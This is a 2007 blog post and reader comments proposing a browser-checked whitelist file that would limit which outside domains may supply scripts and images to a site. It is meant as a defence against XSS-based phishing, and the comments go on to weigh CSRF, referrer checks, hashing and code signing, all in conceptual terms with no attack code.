20070109

Server Trust Violation

The more I think about common types of XSS and phishing attacks, and as I do more of them during blackbox testing, my first goal is usually to get the browser to load malicious script off my site. The XSS hole usually doesn't have that big of a payload window, so it works out better for testing if I can just use an editor to do a great deal of scripting.

On a completely unrelated (I'll put them together in a minute) note, there have been several cases of late where website A will include an image from website B. Rather than downloading the image and giving credit for it, they just reference the image directly from B. webmaster@B gets really mad at webmaster@A, so webmaster@B replaces the image with something naughty, so users of A see something they really weren't expecting making webmaster@A look really bad.

And on a third completely unrelated note, there are lots of public script libraries out there. And many of them ask that you use them by including the URL back to their site. The most common ones use information from your account at the script provider site in a dynamically-created script.

What's interesting about these three cases is that neither the browser, nor the web server has any way of verifying the identity of what they pulled in. The place where I see this being most annoying is in phishing attacks. I use site A to load script of attacker site B, into the victim's browser. There's nothing in place that says that A can't include script from site B. Now, I have no problem with A legitimately including script loaded from B - but in this case, A didn't REALLY want it.

Should we push for something like robots.txt or favicon.ico - something that the browser will load automatically from a requested domain that includes a whitelist of directly-loaded resources? So if refwhitelist.txt doesn't include B, any scripts (images, css, etc.) from B aren't loaded?

I should probably flesh such ideas out more before publishing, but if you become rich and famous for making a better idea public, be sure to throw me a bone.

3 comments:

  1. Don't forget the other way around either. The problem there isn't XSS but CSRF. So you'd also like a whitelist of domains which are allowed to connect to your server. The latter is actually implemented for xhr from flash, so it's probably possible to reuse the design.

    A problem which remains with this approach is what to do if you want to load images from domain A but not scripts. You can't use mime-types (or at least you wouldn't want to, since you don't know them before requesting the file), and extensions aren't really trustable either. You might use the place from which it is included in the html, but then you're using knowledge from your application (html) in the transport layer (http), which also isn't very good design imho.

    ReplyDelete
  2. Good input, Mark - I assume you mean that you'd want to check the referrer for particular requests?

    At the browser level, I had also considered specifying hashes of what the included content should be on the including site - but if you consistently knew what the hash would be, then the content would be static, in which case the including site might as well include it itself.

    I also considered signing the code. Site A will include content from B, so A and B conspire a signing key in advance, and B has to sign with that key. The public part of that key is included on A's site. The browser just has to check when both pieces are received. The problem with this is that it REALLY stifles the whole sharing idea if you have to conspire with every potential user of your content.

    ReplyDelete
  3. Yes, basically i mean checking the referrer, but just checking the http referrer isn't enough, since it was never designed as security feature, is fakeable (using flash) and is blocked by several firewalls.

    Also, another thing which we need to consider is what the default configuration will have to be for a site which hasn't implemented this scheme, whichever it will be. I can't see any other solution than to allow everything, because else you would break the whole web.

    So since the default configuration for a site would be very unsafe, you want to make it as easy as possible to join for sites. I think that already rules out everything which you can't do with notepad (like hashing and signing). While this may not yield the safest method in the end that is not what we're after either (I think).

    What we want is a method which makes it very easy for a site to limit their xss problems. And i don't really think most of the sites allow a lot of external resources, other than some ads, so having a small whitelist should probably be enough anyways, right?

    ReplyDelete